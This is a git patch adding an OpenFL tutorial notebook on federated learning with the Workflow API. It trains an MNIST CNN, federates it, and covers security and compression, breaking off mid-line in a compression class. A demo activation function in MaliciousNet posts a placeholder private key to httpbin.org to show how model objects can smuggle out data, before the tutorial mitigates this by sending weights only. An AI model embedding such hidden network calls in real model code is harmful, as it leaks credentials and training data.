From 15fead6a78e1af02082e8151f652d20b90a9150b Mon Sep 17 00:00:00 2001 From: Patrick Foley Date: Tue, 8 Jul 2025 16:47:40 -0700 Subject: [PATCH] Initial commit of tutorial demonstrating fine grained control of information transfer between parties using Workflow API Signed-off-by: Patrick Foley --- .../Demystifying_Federated_Learning.ipynb | 1451 +++++++++++++++++ 1 file changed, 1451 insertions(+) create mode 100644 openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb diff --git a/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb b/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb new file mode 100644 index 0000000000..3fb2be7973 --- /dev/null +++ b/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb @@ -0,0 +1,1451 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "id": "14821d97", + "metadata": { + "id": "14821d97" + }, + "source": [ + "# Demystifying Federated Learning\n", + "[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/psfoley/openfl/blob/develop/openfl-tutorials/experimental/workflow/Demystifying_Federated_Learning.ipynb)" + ] + }, + { + "cell_type": "markdown", + "id": "bd059520", + "metadata": { + "id": "bd059520" + }, + "source": [ + "Federated learning - in its most basic form - is very easy to understand and implement. Most deep learning training is centralized, which in many cases means moving data to a common location. There are many industries, like health care and banking, where data can't be moved for privacy or regulatory reasons. Federated learning helps solve this problem by training models on the data *without moving it*, and then iteratively combining the models trained at the edge on a central server. Easy!\n", + "\n", + "Well...this turns out to be mostly true. 
In the first entry in our series on **Demystifying Federated Learning** we will go one level deeper and take a bottom-up approach to how federated learning frameworks work internally. This will help you understand some of the most important requirements when working with federated systems, such as:\n", + "\n", + "1. [Mitigating Security and Privacy Risks](#security)\n", + "2. [Minimizing Communication Overhead](#compression)\n", + "\n", + "We will also cover some techniques to address these. By the end of this notebook, you'll have a nuanced understanding of these frameworks, and be able to apply advanced techniques to your own federated learning experiments.\n", + "\n", + "Now without further ado, let's dive in." + ] + }, + { + "cell_type": "markdown", + "id": "fc8e35da", + "metadata": { + "id": "fc8e35da" + }, + "source": [ + "# Getting Started" + ] + }, + { + "cell_type": "markdown", + "id": "4dbb89b6", + "metadata": { + "id": "4dbb89b6" + }, + "source": [ + "First we start by installing the necessary dependencies for the workflow interface." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "f7f98600", + "metadata": { + "id": "f7f98600" + }, + "outputs": [], + "source": [ + "!pip install git+https://github.com/securefederatedai/openfl.git\n", + "!pip install -r workflow_interface_requirements.txt\n", + "!pip install torch\n", + "!pip install torchvision\n", + "!pip install -U ipywidgets\n", + "\n", + "# Uncomment this if running in Google Colab and set USERNAME if running in docker container.\n", + "!pip install -r https://raw.githubusercontent.com/securefederatedai/openfl/develop/openfl-tutorials/experimental/workflow/workflow_interface_requirements.txt\n", + "import os\n", + "os.environ[\"USERNAME\"] = \"colab\"" + ] + }, + { + "cell_type": "markdown", + "source": [ + "# Centralized Training with PyTorch" + ], + "metadata": { + "id": "DUDE77Pm41kp" + }, + "id": "DUDE77Pm41kp" + }, + { + "cell_type": "markdown", + "id": "7237eac4", + "metadata": { + "id": 
"7237eac4" + }, + "source": [ + "We begin with the quintessential centralized example of a small pytorch CNN model trained on the MNIST dataset, adapted from Pytorch's own examples. Let's start by defining our dataloaders, model, optimizer, and some helper functions, and then train this small model on the MNIST." + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "7e85e030", + "metadata": { + "id": "7e85e030" + }, + "outputs": [], + "source": [ + "# Added to suppress pytorch log_softmax warnings from ipykernel\n", + "import warnings\n", + "warnings.filterwarnings('ignore')\n", + "\n", + "import torch.nn as nn\n", + "import torch.nn.functional as F\n", + "import torch.optim as optim\n", + "import torch\n", + "import torchvision\n", + "import numpy as np\n", + "\n", + "n_epochs = 3\n", + "batch_size_train = 64\n", + "batch_size_test = 1000\n", + "learning_rate = 0.01\n", + "momentum = 0.5\n", + "log_interval = 10\n", + "\n", + "random_seed = 1\n", + "torch.backends.cudnn.enabled = False\n", + "torch.manual_seed(random_seed)\n", + "\n", + "mnist_train = torchvision.datasets.MNIST(\n", + " \"./files/\",\n", + " train=True,\n", + " download=True,\n", + " transform=torchvision.transforms.Compose(\n", + " [\n", + " torchvision.transforms.ToTensor(),\n", + " torchvision.transforms.Normalize((0.1307,), (0.3081,)),\n", + " ]\n", + " ),\n", + ")\n", + "\n", + "mnist_test = torchvision.datasets.MNIST(\n", + " \"./files/\",\n", + " train=False,\n", + " download=True,\n", + " transform=torchvision.transforms.Compose(\n", + " [\n", + " torchvision.transforms.ToTensor(),\n", + " torchvision.transforms.Normalize((0.1307,), (0.3081,)),\n", + " ]\n", + " ),\n", + ")\n", + "\n", + "class Net(nn.Module):\n", + " def __init__(self):\n", + " super(Net, self).__init__()\n", + " self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n", + " self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n", + " self.conv2_drop = nn.Dropout2d()\n", + " self.fc1 = nn.Linear(320, 50)\n", + " self.fc2 
= nn.Linear(50, 10)\n", + "\n", + " def forward(self, x):\n", + " x = F.relu(F.max_pool2d(self.conv1(x), 2))\n", + " x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n", + " x = x.view(-1, 320)\n", + " x = F.relu(self.fc1(x))\n", + " x = F.dropout(x, training=self.training)\n", + " x = self.fc2(x)\n", + " return F.log_softmax(x, dim=1)\n", + "\n", + "def inference(model, test_loader):\n", + " model.eval()\n", + " test_loss = 0\n", + " correct = 0\n", + " with torch.no_grad():\n", + " for data, target in test_loader:\n", + " output = model(data)\n", + " test_loss += F.nll_loss(output, target, reduction='sum').item()\n", + " pred = output.data.max(1, keepdim=True)[1]\n", + " correct += pred.eq(target.data.view_as(pred)).sum().item()\n", + " test_loss /= len(test_loader.dataset)\n", + " print('\\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n", + " test_loss, correct, len(test_loader.dataset),\n", + " 100. * correct / len(test_loader.dataset)))\n", + " accuracy = float(correct / len(test_loader.dataset))\n", + " return accuracy\n", + "\n", + "def train(model, optimizer, train_loader):\n", + " model.train()\n", + " optimizer = optim.SGD(model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(train_loader):\n", + " optimizer.zero_grad()\n", + " output = model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(train_loader.dataset),\n", + " 100. 
* batch_idx / len(train_loader), loss.item()))\n", + " loss = loss.item()\n", + " return loss\n", + "\n", + "model = Net()\n", + "optimizer = optim.SGD(model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + "train(model, optimizer, torch.utils.data.DataLoader(mnist_train,batch_size=batch_size_train, shuffle=True))\n", + "centralized_accuracy = inference(model, torch.utils.data.DataLoader(mnist_test,batch_size=batch_size_test, shuffle=False))" + ] + }, + { + "cell_type": "markdown", + "source": [ + "# Adapting the example to Federated Learning" + ], + "metadata": { + "id": "qOTatc405Eub" + }, + "id": "qOTatc405Eub" + }, + { + "cell_type": "markdown", + "source": [ + "Now let's adapt this centralized example to a minimal federated learning experiment using OpenFL's Workflow API." + ], + "metadata": { + "id": "il2ZZXEsxPIH" + }, + "id": "il2ZZXEsxPIH" + }, + { + "cell_type": "markdown", + "source": [ + "Here we encounter the first OpenFL-related imports:\n", + "\n", + "- `FLSpec` – Defines the workflow specification. User-defined flows are subclasses of this.\n", + "- `Runtime` – Defines where the flow runs and the infrastructure for task transitions (how information gets sent). The `LocalRuntime` runs the flow on a single node.\n", + "- `aggregator/collaborator` – Placement decorators that define where a task will be assigned: either at the server or at the client(s).\n", + "- We also define a `FedAvg` aggregation function to combine the trained models coming from each of the collaborators. This takes an average of the collaborators' model weights. The average can optionally be weighted, for example by the number of data samples present at each collaborator; the flow below calls it without weights, so every collaborator counts equally." 
+ ], + "metadata": { + "id": "fBrZiwDPQNKP" + }, + "id": "fBrZiwDPQNKP" + }, + { + "cell_type": "code", + "source": [ + "from copy import deepcopy\n", + "\n", + "from openfl.experimental.workflow.interface import FLSpec, Aggregator, Collaborator\n", + "from openfl.experimental.workflow.runtime import LocalRuntime\n", + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "\n", + "def FedAvg(models, weights=None):\n", + " new_model = deepcopy(models[0])\n", + " state_dicts = [model.state_dict() for model in models]\n", + " state_dict = new_model.state_dict()\n", + " for key in state_dicts[0]:\n", + " state_dict[key] = torch.from_numpy(np.average([state[key].numpy() for state in state_dicts],\n", + " axis=0,\n", + " weights=weights))\n", + " new_model.load_state_dict(state_dict)\n", + " return new_model" + ], + "metadata": { + "id": "9jXdBg-BQs61" + }, + "id": "9jXdBg-BQs61", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Now we come to the flow definition. The OpenFL Workflow Interface adopts the conventions set by Metaflow: every workflow begins with the `start` task and concludes with the `end` task. The flow is initialized with an optionally passed-in model and optimizer. The aggregator begins the flow with the `start` task, where the list of collaborators is extracted from the runtime (`self.collaborators = self.runtime.collaborators`) and is then used as the list of participants to run the task listed in `self.next`, `aggregated_model_validation`. The model, optimizer, and anything that is not explicitly excluded from the next function will be passed from the `start` function on the aggregator to the `aggregated_model_validation` task on the collaborator. Where the tasks run is determined by the placement decorator that precedes each task definition (`@aggregator` or `@collaborator`). 
Once each of the collaborators (defined in the runtime) completes the `aggregated_model_validation` task, it passes its current state on to the `train` task, from `train` to `local_model_validation`, and then finally to `join` at the aggregator. It is in `join` that an average is taken of the model weights, and the next round can begin.\n", + "\n", + "![image.png](attachment:image.png)" + ], + "metadata": { + "id": "XudMPcaYRE2F" + }, + "id": "XudMPcaYRE2F" + }, + { + "cell_type": "code", + "execution_count": null, + "metadata": { + "id": "HprheHwNL0AC" + }, + "outputs": [], + "source": [ + "class LogicalFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, **kwargs):\n", + " super().__init__(**kwargs)\n", + " if model is not None:\n", + " self.model = model\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round = 0\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " # This is the training function\n", + " # Notice it doesn't have a placement decorator, which means it can be called\n", + " # from the collaborator or aggregator\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", 
+ " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. * batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " self.model = FedAvg([input.model for input in inputs])\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "id": "HprheHwNL0AC" + }, + 
{ + "cell_type": "markdown", + "id": "2aabf61e", + "metadata": { + "id": "2aabf61e" + }, + "source": [ + "You'll notice in the `LogicalFlow` definition above that there were certain attributes that the flow was not initialized with, namely the `train_loader` and `test_loader` for each of the collaborators. These are **private_attributes** of the particular participant and (as the name suggests) are accessible ONLY to that participant through its tasks. Additionally, these private attributes are always filtered out of the current state when transferring from collaborator to aggregator, and vice versa.\n", + "\n", + "Users can directly specify a collaborator's private attributes via `collaborator.private_attributes`, which is a dictionary where each key is the name of an attribute and each value is the object that is made accessible to the collaborator. In this example, we segment shards of the MNIST dataset for four collaborators: `Portland`, `Seattle`, `Chandler` and `Bangalore`. Each shard / slice of the dataset is assigned to the corresponding collaborator's private attributes.\n", + "\n", + "Note that the private attributes are flexible, and the user can choose to pass in a completely different type of object to any of the collaborators or the aggregator (with an arbitrary name)." 
+ ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "forward-world", + "metadata": { + "id": "forward-world" + }, + "outputs": [], + "source": [ + "# Setup participants\n", + "aggregator = Aggregator()\n", + "aggregator.private_attributes = {}\n", + "\n", + "# Setup collaborators with private attributes\n", + "collaborator_names = ['Portland', 'Seattle', 'Chandler','Bangalore']\n", + "collaborators = [Collaborator(name=name) for name in collaborator_names]\n", + "for idx, collaborator in enumerate(collaborators):\n", + " local_train = deepcopy(mnist_train)\n", + " local_test = deepcopy(mnist_test)\n", + " local_train.data = mnist_train.data[idx::len(collaborators)]\n", + " local_train.targets = mnist_train.targets[idx::len(collaborators)]\n", + " local_test.data = mnist_test.data[idx::len(collaborators)]\n", + " local_test.targets = mnist_test.targets[idx::len(collaborators)]\n", + " collaborator.private_attributes = {\n", + " 'train_loader': torch.utils.data.DataLoader(local_train,batch_size=batch_size_train, shuffle=True),\n", + " 'test_loader': torch.utils.data.DataLoader(local_test,batch_size=batch_size_train, shuffle=True)\n", + " }\n", + "\n", + "local_runtime = LocalRuntime(aggregator=aggregator, collaborators=collaborators, backend='single_process')\n", + "print(f'Local runtime collaborators = {local_runtime.collaborators}')" + ] + }, + { + "cell_type": "markdown", + "id": "278ad46b", + "metadata": { + "id": "278ad46b" + }, + "source": [ + "With the `LocalRuntime`, this federated learning experiment will run in simulation mode. To adapt this to a real-world distributed environment, you can instead use the `FederatedRuntime` without changing the flow definition.\n", + "\n", + "Now that we have our flow and runtime defined, let's run the experiment!" 
+ ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "a175b4d6", + "metadata": { + "id": "a175b4d6" + }, + "outputs": [], + "source": [ + "model = None\n", + "best_model = None\n", + "optimizer = None\n", + "flflow = LogicalFlow(model, optimizer, rounds=2, checkpoint=True)\n", + "flflow.runtime = local_runtime\n", + "flflow.run()" + ] + }, + { + "cell_type": "markdown", + "id": "9a7cc8f7", + "metadata": { + "id": "9a7cc8f7" + }, + "source": [ + "Now that the flow has completed, let's get the final model and accuracy" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "863761fe", + "metadata": { + "id": "863761fe" + }, + "outputs": [], + "source": [ + "print(f'\\nFinal aggregated model accuracy for {flflow.rounds} rounds of training: {flflow.aggregated_model_accuracy}')" + ] + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "# Preventing Malicious Models" + ], + "metadata": { + "id": "PeBX-zLezI5m" + }, + "id": "PeBX-zLezI5m" + }, + { + "cell_type": "markdown", + "source": [ + "That achieved the high level goal of training a model on a client's local data. One of the challenges with this is that the model object was sent between client and server. 
This works fine for a basic simulation, but it poses both algorithmic and security challenges:\n", + "\n", + "**Aggregation algorithm**: Methods to combine model weights become framework dependent (in this case, Pytorch specific).\n", + "\n", + "**Malicious object code**: The bigger issue for the real world is that different parties would be able to embed information into the model object.\n", + "\n", + "Let's add a `very_leaky_relu` activation function to demonstrate how easily a model can be made malicious:" + ], + "metadata": { + "id": "sETGsgdinVEb" + }, + "id": "sETGsgdinVEb" + }, + { + "cell_type": "code", + "source": [ + "import requests\n", + "import random\n", + "\n", + "def F_very_leaky_relu(tensor):\n", + " tensor = F.relu(tensor)\n", + " # private key sent to malicious remote server\n", + " if random.randint(0,100) == 50:\n", + " requests.post(\"https://httpbin.org/post\",data={'your_private_key': 'super secret key'})\n", + " print(\"All your base are belong to us!\")\n", + " return tensor\n", + "\n", + "class MaliciousNet(nn.Module):\n", + " def __init__(self):\n", + " super(MaliciousNet, self).__init__()\n", + " self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n", + " self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n", + " self.conv2_drop = nn.Dropout2d()\n", + " self.fc1 = nn.Linear(320, 50)\n", + " self.fc2 = nn.Linear(50, 10)\n", + "\n", + " def forward(self, x):\n", + " x = F_very_leaky_relu(F.max_pool2d(self.conv1(x), 2))\n", + " x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n", + " x = x.view(-1, 320)\n", + " x = F.relu(self.fc1(x))\n", + "\n", + " x = F.dropout(x, training=self.training)\n", + " x = self.fc2(x)\n", + " return F.log_softmax(x)" + ], + "metadata": { + "id": "yh8KgY07p3-7" + }, + "id": "yh8KgY07p3-7", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "id": "5dd1558c", + "metadata": { + "id": "5dd1558c" + }, + "source": [ + "This malicious model can then be used as a basis for the LogicalFlow 
defined earlier:" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "443b06e2", + "metadata": { + "id": "443b06e2" + }, + "outputs": [], + "source": [ + "flflow2 = LogicalFlow(model=MaliciousNet(), rounds=2)\n", + "flflow2.runtime = local_runtime\n", + "flflow2.run()" + ] + }, + { + "cell_type": "markdown", + "source": [ + "Uh oh! Now each client's private credentials have been stolen, allowing the clients to be impersonated by bad actors.\n", + "\n", + "With this type of attack, arbitrary functionality can be added, **making it possible to exfiltrate the training data itself**.\n", + "\n", + "Let's see how we can prevent this by relying on a **known good version of the model** and only allowing model weights to be updated:" + ], + "metadata": { + "id": "DXRzeIi_C_5P" + }, + "id": "DXRzeIi_C_5P" + }, + { + "cell_type": "code", + "source": [ + "#Utility functions for getting and setting weights\n", + "\n", + "def to_cpu_numpy(state):\n", + " \"\"\"Send data to CPU as Numpy array.\n", + "\n", + " Args:\n", + " state (dict): The state dictionary.\n", + "\n", + " Returns:\n", + " state (dict): State dictionary with values as numpy arrays.\n", + " \"\"\"\n", + " # deep copy so as to decouple from active model\n", + " state = deepcopy(state)\n", + "\n", + " for k, v in state.items():\n", + " # When restoring, we currently assume all values are tensors.\n", + " if not torch.is_tensor(v):\n", + " raise ValueError(\n", + " \"We do not currently support non-tensors coming from model.state_dict()\"\n", + " )\n", + " # get as a numpy array, making sure it is on cpu\n", + " state[k] = v.cpu().numpy()\n", + " return state\n", + "\n", + "\n", + "def get_weights(model):\n", + " \"\"\"Return the tensor dictionary.\n", + "\n", + " Args:\n", + " model: The model whose weights are returned (not including optimizer tensors)\n", + "\n", + " Returns:\n", + " state (dict): Tensor dictionary {**dict}\n", + " \"\"\"\n", + "\n", + " state = to_cpu_numpy(model.state_dict())\n", + "\n", 
+ " return state\n", + "\n", + "def set_weights(model, tensor_dict, device='cpu'):\n", + " \"\"\"Set the model weights.\n", + "\n", + " Args:\n", + " tensor_dict (dict): The tensor dictionary.\n", + " device (string): The device for the correct placement of tensors\n", + " \"\"\"\n", + "\n", + " new_state = {}\n", + " # Grabbing keys from model's state_dict helps to confirm we have\n", + " # everything\n", + " for k in model.state_dict():\n", + " new_state[k] = torch.tensor(tensor_dict.pop(k)).to(device)\n", + "\n", + " # set model state\n", + " model.load_state_dict(new_state)\n", + "\n", + " return model" + ], + "metadata": { + "id": "PMC5op8IJYlZ" + }, + "id": "PMC5op8IJYlZ", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "def WeightsOnlyFedAvg(models_weights, relative_weights=None):\n", + " new_weights = deepcopy(models_weights[0])\n", + " for key in models_weights[1]:\n", + " new_weights[key] = np.average([state[key] for state in models_weights],\n", + " axis=0,\n", + " weights=relative_weights)\n", + " return new_weights" + ], + "metadata": { + "id": "qjlH3yrhPSJh" + }, + "execution_count": null, + "outputs": [], + "id": "qjlH3yrhPSJh" + }, + { + "cell_type": "code", + "source": [ + "from openfl.experimental.workflow.placement import aggregator, collaborator\n", + "\n", + "class WeightsOnlyFlow(FLSpec):\n", + "\n", + " def __init__(self, model=None, optimizer=None, rounds=3, **kwargs):\n", + " super().__init__(**kwargs)\n", + " if model is not None:\n", + " self.model = model\n", + " print(f'setting self.model to {model}')\n", + " self.optimizer = optimizer\n", + " else:\n", + " self.model = Net()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.rounds = rounds\n", + "\n", + " @aggregator\n", + " def start(self):\n", + " print(f'Performing initialization for model')\n", + " self.collaborators = self.runtime.collaborators\n", + " self.current_round 
= 0\n", + " ### Let's extract the weights from the model definition\n", + " #print(f'self.model = {self.model}')\n", + " self.model_weights = get_weights(self.model)\n", + " self.next(self.aggregated_model_validation, foreach='collaborators')\n", + "\n", + " @collaborator\n", + " def aggregated_model_validation(self):\n", + " self.model = set_weights(self.model,self.model_weights)\n", + " print(f'Performing aggregated model validation for collaborator {self.input}')\n", + " self.agg_validation_score = inference(self.model, self.test_loader)\n", + " print(f'{self.input} value of {self.agg_validation_score}')\n", + " self.next(self.train)\n", + "\n", + " def train_func(self):\n", + " train_losses = []\n", + " for batch_idx, (data, target) in enumerate(self.train_loader):\n", + " self.optimizer.zero_grad()\n", + " output = self.model(data)\n", + " loss = F.nll_loss(output, target)\n", + " loss.backward()\n", + " self.optimizer.step()\n", + " if batch_idx % log_interval == 0:\n", + " print('Train Epoch: 1 [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n", + " batch_idx * len(data), len(self.train_loader.dataset),\n", + " 100. 
* batch_idx / len(self.train_loader), loss.item()))\n", + " self.loss = loss.item()\n", + "\n", + " @collaborator\n", + " def train(self):\n", + " self.model.train()\n", + " self.optimizer = optim.SGD(self.model.parameters(), lr=learning_rate,\n", + " momentum=momentum)\n", + " self.train_func()\n", + " self.next(self.local_model_validation)\n", + "\n", + " @collaborator\n", + " def local_model_validation(self):\n", + " self.local_validation_score = inference(self.model, self.test_loader)\n", + " print(\n", + " f'Doing local model validation for collaborator {self.input}: {self.local_validation_score}')\n", + " self.model_weights = get_weights(self.model)\n", + " self.next(self.join)\n", + "\n", + " @aggregator\n", + " def join(self, inputs):\n", + " self.average_loss = sum(input.loss for input in inputs) / len(inputs)\n", + " self.aggregated_model_accuracy = sum(\n", + " input.agg_validation_score for input in inputs) / len(inputs)\n", + " self.local_model_accuracy = sum(\n", + " input.local_validation_score for input in inputs) / len(inputs)\n", + " print(f'Average aggregated model validation values = {self.aggregated_model_accuracy}')\n", + " print(f'Average training loss = {self.average_loss}')\n", + " print(f'Average local model validation values = {self.local_model_accuracy}')\n", + " self.model_weights = WeightsOnlyFedAvg([input.model_weights for input in inputs])\n", + " self.optimizer = [input.optimizer for input in inputs][0]\n", + " self.current_round += 1\n", + " if self.current_round < self.rounds:\n", + " self.next(self.aggregated_model_validation,\n", + " foreach='collaborators')\n", + " else:\n", + " self.next(self.end)\n", + "\n", + " @aggregator\n", + " def end(self):\n", + " print(f'This is the end of the flow')" + ], + "metadata": { + "id": "aKNuHq0nHecL" + }, + "id": "aKNuHq0nHecL", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "id": "a61a876d", + "metadata": { + "id": "a61a876d" + }, + "source": [ + "Now 
let's make sure that each Collaborator has its own reference to a valid model ahead of time\n", + "\n", + "\n" + ] + }, + { + "cell_type": "code", + "execution_count": null, + "id": "verified-favor", + "metadata": { + "id": "verified-favor" + }, + "outputs": [], + "source": [ + "for col in collaborators:\n", + " col.private_attributes['model'] = Net()\n", + "\n", + "updated_local_runtime = LocalRuntime(aggregator=Aggregator(), collaborators=collaborators, backend='single_process')" + ] + }, + { + "cell_type": "markdown", + "source": [ + "Now that each collaborator has its own verified model, let's try to sneak in a malicious model at runtime:" + ], + "metadata": { + "id": "Vg2tCwSBSHlD" + }, + "id": "Vg2tCwSBSHlD" + }, + { + "cell_type": "code", + "source": [ + "flflow3 = WeightsOnlyFlow(model=MaliciousNet(), rounds=2)\n", + "flflow3.runtime = updated_local_runtime\n", + "flflow3.run()" + ], + "metadata": { + "id": "4JOzZEEuSGAm" + }, + "id": "4JOzZEEuSGAm", + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "Even with a malicious model seeded in the workflow, restricting the information transferred between parties to model weights mitigated the threat!\n", + "\n", + "A side benefit of exclusively sending weights is that the aggregation function now operates on plain NumPy arrays, so it can be reused for other frameworks." + ], + "metadata": { + "id": "x9CtL9QqRlOO" + }, + "id": "x9CtL9QqRlOO" + }, + { + "cell_type": "markdown", + "source": [ + "\n", + "# Reduce Communication Overhead with Compression" + ], + "metadata": { + "id": "ywwvkbTvzYZD" + }, + "id": "ywwvkbTvzYZD" + }, + { + "cell_type": "markdown", + "source": [ + "In this example the model trained at the edge is quite small, and there are only four collaborators. However, in the real world, models may be hundreds of megabytes to gigabytes in size, and collaborators may number well into the thousands. 
The general calculation for model weights transferred each round is:\n", + "\n", + "$$CommunicationPerRound = 2*collaborators*model\\_size$$\n", + "\n", + "The factor of 2 accounts for each collaborator both receiving the aggregated model and sending back its updated weights. For these real-world cases, reducing the *model_size* term will clearly have a great impact. There are multiple approaches to accomplish this, but today we will focus on **Compressing Model Tensors**. First, let's compress each of the layer weights directly. We start by defining lossless and lossy compression classes:" + ], + "metadata": { + "id": "K0_RI0xSxOGY" + }, + "id": "K0_RI0xSxOGY" + }, + { + "cell_type": "code", + "source": [ + "from openfl.pipelines.kc_pipeline import GZIPTransformer, KCPipeline\n", + "from openfl.pipelines import SKCPipeline\n", + "\n", + "class Compression:\n", + " \"\"\"\n", + " Compression interface for lossless and lossy compression\n", + " \"\"\"\n", + "\n", + " @staticmethod\n", + " def forward(weight_dict):\n", + " \"\"\"\n", + " Compress the weight dictionary\n", + "\n", + " args:\n", + " weight_dict: dictionary of weight tensors\n", + "\n", + " returns:\n", + " compressed_weight_dict: dictionary of compressed weight tensors\n", + " weight_dict_metadata: dictionary of metadata for each tensor\n", + " \"\"\"\n", + " raise NotImplementedError\n", + "\n", + " @staticmethod\n", + " def backward(compressed_weight_dict, weight_dict_metadata):\n", + " \"\"\"\n", + " Decompress the weight dictionary\n", + "\n", + " args:\n", + " compressed_weight_dict: dictionary of compressed weight tensors\n", + " weight_dict_metadata: dictionary of metadata for each tensor\n", + "\n", + " returns:\n", + " decompressed_weight_dict: dictionary of decompressed weight tensors\n", + " \"\"\"\n", + " raise NotImplementedError\n", + "\n", + "\n", + "class LosslessCompression(Compression):\n", + " \"\"\"\n", + " Wrapper for losslessly compressing / decompressing model dictionaries\n", + " \"\"\"\n", + "\n", + " @staticmethod\n", + " def forward(weight_dict):\n", + " lossless_transformer = 
GZIPTransformer()\n", + " compressed_weight_dict = {}\n", + " weight_dict_metadata = {}\n", + " original_model_size = 0\n", + " compressed_model_size = 0\n", + " for key in weight_dict.keys():\n", + " original_model_size += weight_dict[key].nbytes\n", + " tensor_shape = weight_dict[key].shape\n", + " compressed_weight_dict[key], weight_dict_metadata[key] = lossless_transformer.forward(weight_dict[key])\n", + " compressed_model_size += len(compressed_weight_dict[key])\n", + " weight_dict_metadata[key] = tensor_shape\n", + " relative_size = compressed_model_size/original_model_size\n", + " print(f'Compressed tensors are {100*relative_size:.1f}% of original model weights')\n", + " return compressed_weight_dict, weight_dict_metadata, relative_size\n", + "\n", + " @staticmethod\n", + " def backward(compressed_weight_dict, weight_dict_metadata):\n", + " lossless_transformer = GZIPTransformer()\n", + " weight_dict = {}\n", + " for key in compressed_weight_dict.keys():\n", + " weight_dict[key] = lossless_transformer.backward(compressed_weight_dict[key], weight_dict_metadata[key])\n", + " # reshape decompressed tensor\n", + " weight_dict[key] = weight_dict[key].reshape(weight_dict_metadata[key])\n", + " return weight_dict\n", + "\n", + "class LossyCompression(Compression):\n", + " \"\"\"\n", + " Wrapper for lossy compressing / decompressing model dictionaries using K-means and GZIP\n", + " \"\"\"\n", + "\n", + " def __init__(self, n_clusters=6):\n", + " self.n_clusters = n_clusters\n", + "\n", + " def forward(self,weight_dict):\n", + " kcpipeline = KCPipeline(n_clusters=self.n_clusters)\n", + " compressed_weight_dict = {}\n", + " weight_dict_metadata = {}\n", + " original_model_size = 0\n", + " compressed_model_size = 0\n", + " for key in weight_dict.keys():\n", + " original_model_size += weight_dict[key].nbytes\n", + " compressed_weight_dict[key], weight_dict_metadata[key] = 